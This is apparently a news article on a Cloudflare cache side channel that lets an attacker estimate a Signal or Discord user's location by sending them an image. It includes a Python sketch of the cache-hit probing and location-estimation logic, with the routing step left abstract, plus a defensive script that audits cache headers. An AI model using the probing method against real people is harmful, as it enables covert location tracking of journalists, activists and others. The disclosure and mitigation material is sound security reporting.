Cloudflare CDN Flaw Enables Zero-Click Geo-Location Attack via Signal, Discord

by | Jan 23, 2025 | News





A newly discovered flaw in Cloudflare’s content delivery network (CDN) could allow attackers to approximate a target’s location within 50-300 miles by sending them an image on platforms like Signal and Discord. This zero-click attack raises serious privacy concerns for journalists, activists, and other privacy-conscious individuals.

How the Flaw Works

Security researcher Daniel (hackermondev on GitHub) uncovered that Cloudflare’s CDN caches media at whichever data center served the request, which under normal routing is the one nearest the user. By exploiting a bug in Cloudflare Workers, he was able to route requests through specific data centers of his choosing, using a tool he called Cloudflare Teleport.

That capability let him ask each data center in turn for the same image and see which of them already held it in cache. Because the only legitimate fetch of a one-off image URL is the target’s own client, a cache hit at a data center places the target in the area that data center serves; Cloudflare names each data center after a nearby airport code, so the hits translate directly into an approximate location.

Stealthy Zero-Click Tracking Explained

Three months ago, Daniel discovered a vulnerability in how Cloudflare’s content delivery network (CDN) handles media requests. Cloudflare’s CDN improves website performance by caching media files (such as images) at the data center closest to the user. That optimization doubles as a side channel: whether a given data center has a file cached reveals whether someone near it has requested it, which can be turned into a method for tracking a target’s approximate location without their knowledge or interaction.

How the Zero-Click Deanonymization Works

  1. Sending a Malicious Image:
    The attack starts with the attacker sending the target a message containing an image hosted behind Cloudflare’s CDN. It can be a seemingly innocuous file, such as a screenshot or a profile picture; what matters is that the attacker controls the image and that its URL is unique to this message, so that any cache entry it leaves behind can only have been created by the target’s client.

  2. Exploiting Cloudflare Workers:
    Using a custom-built tool called Cloudflare Teleport, the researcher exploited a bug in Cloudflare Workers, the feature that lets developers run code at the edge to customize CDN behavior. The bug let the attacker route a request through any chosen Cloudflare data center, bypassing the normal behavior of answering from the data center closest to the requester.

  3. Mapping the Target’s Location:
    By querying the image from each data center and checking which ones already had it cached, the attacker learns where the target’s client was served. Each data center corresponds to a nearby airport code, so the set of cache hits places the target within a radius of roughly 50 to 300 miles.
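The three steps above, carried through as an added example (this is illustration code written for this article, not hackermondev’s Cloudflare Teleport tool). The part that is no longer reproducible, reaching a chosen data center, is left as a caller-supplied `fetch_via(colo, url)` function; the original used the Workers bug, the post-patch variant a VPN exit near each data center. The example assumes the probe reads two Cloudflare response headers, `cf-ray` (whose suffix is the serving data center’s airport code) and `cf-cache-status`, and the `COLO_TABLE` mapping is a small hypothetical subset with approximate coordinates:

```python
"""Infer a target's approximate region from which Cloudflare data centers
hold a per-user image in cache.  Added example, not the original tool."""
from __future__ import annotations
from typing import Callable, Iterable, Mapping, Optional

# Assumed header shapes:
#   cf-ray:           "<request id>-<IATA colo code>", e.g. "8f3a1c2d9e4b1234-SEA"
#   cf-cache-status:  HIT | MISS | EXPIRED | DYNAMIC | BYPASS | ...
def colo_from_cf_ray(cf_ray: str) -> Optional[str]:
    """Return the data-center (airport) code from a cf-ray header, or None."""
    _head, sep, tail = cf_ray.strip().rpartition("-")
    if not sep or not tail.isalpha():
        return None
    return tail.upper()

# Hypothetical subset of Cloudflare data centers keyed by airport code.
# Coordinates are rough and exist only so the example is self-contained.
COLO_TABLE = {
    "SEA": ("Seattle", 47.45, -122.31),
    "SJC": ("San Jose", 37.36, -121.93),
    "LAX": ("Los Angeles", 33.94, -118.41),
    "DFW": ("Dallas", 32.90, -97.04),
    "EWR": ("Newark", 40.69, -74.17),
    "FRA": ("Frankfurt", 50.03, 8.57),
}

# Transport that fetches `url` via a specific data center and returns headers.
FetchViaColo = Callable[[str, str], Mapping[str, str]]

def enumerate_cache_hits(url: str, colos: Iterable[str],
                         fetch_via: FetchViaColo) -> dict[str, str]:
    """Ask every data center for `url`; return {colo: status} for cache HITs.

    Probe each data center exactly once: a MISS response populates that
    data center's cache, so a second probe there would report a false HIT.
    """
    hits: dict[str, str] = {}
    for colo in colos:
        headers = {k.lower(): v for k, v in fetch_via(colo, url).items()}
        served_by = colo_from_cf_ray(headers.get("cf-ray", ""))
        if served_by != colo:
            # The request was answered elsewhere (routing did not honour the
            # request); attributing its cache state to `colo` would be wrong.
            continue
        status = headers.get("cf-cache-status", "").upper()
        if status == "HIT":
            hits[colo] = status
    return hits

def estimate_region(hits: Mapping[str, str]) -> tuple[str, ...]:
    """Metro areas served by the HIT data centers (coarse, 50-300 mile radius).
    Near big cities anycast can spread one client over several data centers,
    so several neighbouring hits are expected rather than a single one."""
    return tuple(COLO_TABLE[c][0] for c in sorted(hits) if c in COLO_TABLE)

# Constructed stand-in for the transport: in this scenario only SEA has the
# image cached, i.e. the target's client fetched it from the Pacific Northwest.
def fake_fetch_via(colo: str, url: str) -> dict[str, str]:
    status = "HIT" if colo == "SEA" else "MISS"
    return {"CF-RAY": f"8f3a1c2d9e4b1234-{colo}", "CF-Cache-Status": status}

if __name__ == "__main__":
    found = enumerate_cache_hits("https://example.invalid/img.png",
                                 COLO_TABLE, fake_fetch_via)
    print(found, estimate_region(found))
```

The `served_by != colo` check is the part worth keeping even outside this attack: a probe that silently accepts an answer from a different data center will misattribute cache state, which is also why the VPN-based variant described later only covers the data centers an exit node can actually land on.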

[Figure: Calculating response times]
Source: hackermondev | GitHub


Why It’s a Zero-Click Attack

This method doesn’t require the target to interact with the malicious image or message. Applications like Signal and Discord automatically download images to render push notifications and message previews, so the fetch, and with it the cache entry at the data center nearest the target, happens before the target ever opens the message.

Accuracy and Precision

  • The tracking precision depends on the density of Cloudflare data centers in the region.
  • In urban areas with multiple nearby data centers, the accuracy improves significantly.
  • In rural or less populated regions, the accuracy is broader, typically spanning a radius of 250–300 miles.

[Figure: Locating the target]
Source: hackermondev | GitHub

Experimenting with Discord’s CTO

While testing the attack, Daniel attempted to locate Discord’s CTO, Stanislav Vishnevskiy. He found that anycast routing (a load-balancing behavior in which several nearby data centers share a user’s requests) slightly improved location accuracy around major cities, since the resulting cluster of cache hits narrows the estimate to the metro area they share.




Cloudflare’s Response

Daniel disclosed the vulnerability to Cloudflare, Signal, and Discord. Cloudflare resolved the issue in December 2024, patching the Workers bug and awarding the researcher a $200 bounty.

In a statement to BleepingComputer, a Cloudflare spokesperson said:

“This was first disclosed in December 2024 through our bug bounty program, investigated and immediately resolved… We continue to encourage third parties and researchers to report this type of activity for review by our team.”

Ongoing Feasibility

Despite the patch, Daniel found the attack still partially viable: instead of routing through the Workers bug, the attacker connects through VPN exit points near each data center so that the request is served from that location directly. This approach reaches approximately 54% of Cloudflare’s global data centers, although it is slower and more cumbersome to execute than the original method.

Signal and Discord Responses

  • Signal: Declined to act on the report, stating that providing network-layer anonymity is outside the scope of its mission.
  • Discord: Rejected the report, attributing the issue to Cloudflare.

Mitigation

To prevent similar attacks, Cloudflare customers who serve user-addressed media (message attachments, avatars, link previews) are advised to disable edge caching for that content where the exposure matters, for example by marking those responses private or no-store, and to accept the extra origin load that comes with it. It is worth checking what the edge actually did, not only what the origin sent, since a caching rule at the CDN can override the origin’s headers. The incident underscores a general risk of CDN caching in privacy-sensitive applications: a cache that is keyed by location will leak location.
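One way to audit the advice above, as an added example written for this article rather than code from Cloudflare or from the researcher: given the response headers of per-user media URLs, flag every response that a shared cache is allowed to store or that Cloudflare reports it has stored. The example assumes the edge honours the standard Cache-Control directives `private` and `no-store` (Cloudflare does) and reports its decision in `cf-cache-status`; the URLs and headers in `SAMPLE` are constructed.

```python
"""Flag per-user media responses that a CDN edge may cache.  Added example."""
from __future__ import annotations
from typing import Dict, List, Mapping, Optional, Tuple

# Directives that stop a shared cache (a CDN edge) from storing a response.
EDGE_BLOCKING = ("private", "no-store")
# cf-cache-status values that mean the edge stored (or still holds) the object.
STORED_STATUSES = {"HIT", "MISS", "EXPIRED", "STALE", "REVALIDATED", "UPDATING"}

def parse_cache_control(value: str) -> Dict[str, Optional[str]]:
    """'public, max-age=3600' -> {'public': None, 'max-age': '3600'}"""
    directives: Dict[str, Optional[str]] = {}
    for part in value.split(","):
        part = part.strip().lower()
        if not part:
            continue
        name, _, arg = part.partition("=")
        directives[name.strip()] = arg.strip().strip('"') or None
    return directives

def edge_may_cache(headers: Mapping[str, str]) -> bool:
    """True if nothing in Cache-Control forbids a shared cache from storing it.

    No Cache-Control header at all counts as cacheable: image extensions are
    cached by the CDN by default, which is exactly the case the attack needs.
    """
    h = {k.lower(): v for k, v in headers.items()}
    cc = parse_cache_control(h.get("cache-control", ""))
    if any(d in cc for d in EDGE_BLOCKING):
        return False
    if cc.get("s-maxage") == "0" or cc.get("max-age") == "0":
        return False
    return True

def flag_leaky_media(responses: Mapping[str, Mapping[str, str]]) -> List[Tuple[str, str]]:
    """Return (url, reason) for every per-user resource the edge may or did cache.

    `responses` maps a URL to the headers observed when fetching it through the
    CDN.  Check both the policy the origin sent and what the edge reported:
    a cache rule at the CDN can store an object the origin marked no-store.
    """
    flagged: List[Tuple[str, str]] = []
    for url, headers in responses.items():
        h = {k.lower(): v for k, v in headers.items()}
        status = h.get("cf-cache-status", "").upper()
        if edge_may_cache(headers):
            flagged.append((url, "policy allows shared caching"))
        elif status in STORED_STATUSES:
            flagged.append((url, f"edge reported {status} despite policy"))
    return flagged

# Constructed sample responses for three per-user attachments.
SAMPLE = {
    # Leaky: public, long-lived, and the edge confirms it is cached.
    "https://cdn.example.invalid/attachments/1234/photo.png": {
        "Cache-Control": "public, max-age=31536000",
        "CF-Cache-Status": "HIT",
    },
    # Fixed: origin forbids shared caching and the edge bypassed its cache.
    "https://cdn.example.invalid/attachments/5678/photo.png": {
        "Cache-Control": "private, no-store",
        "CF-Cache-Status": "BYPASS",
    },
    # Misconfigured: origin said no-store, but a CDN cache rule stored it anyway.
    "https://cdn.example.invalid/attachments/9012/photo.png": {
        "Cache-Control": "no-store",
        "CF-Cache-Status": "HIT",
    },
}

if __name__ == "__main__":
    for url, reason in flag_leaky_media(SAMPLE):
        print(f"{reason}: {url}")
```

Run it against real observations by fetching each URL through the CDN and passing the response headers in; the third sample is the case that a header-only review misses.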


Source: bleepingcomputer.com

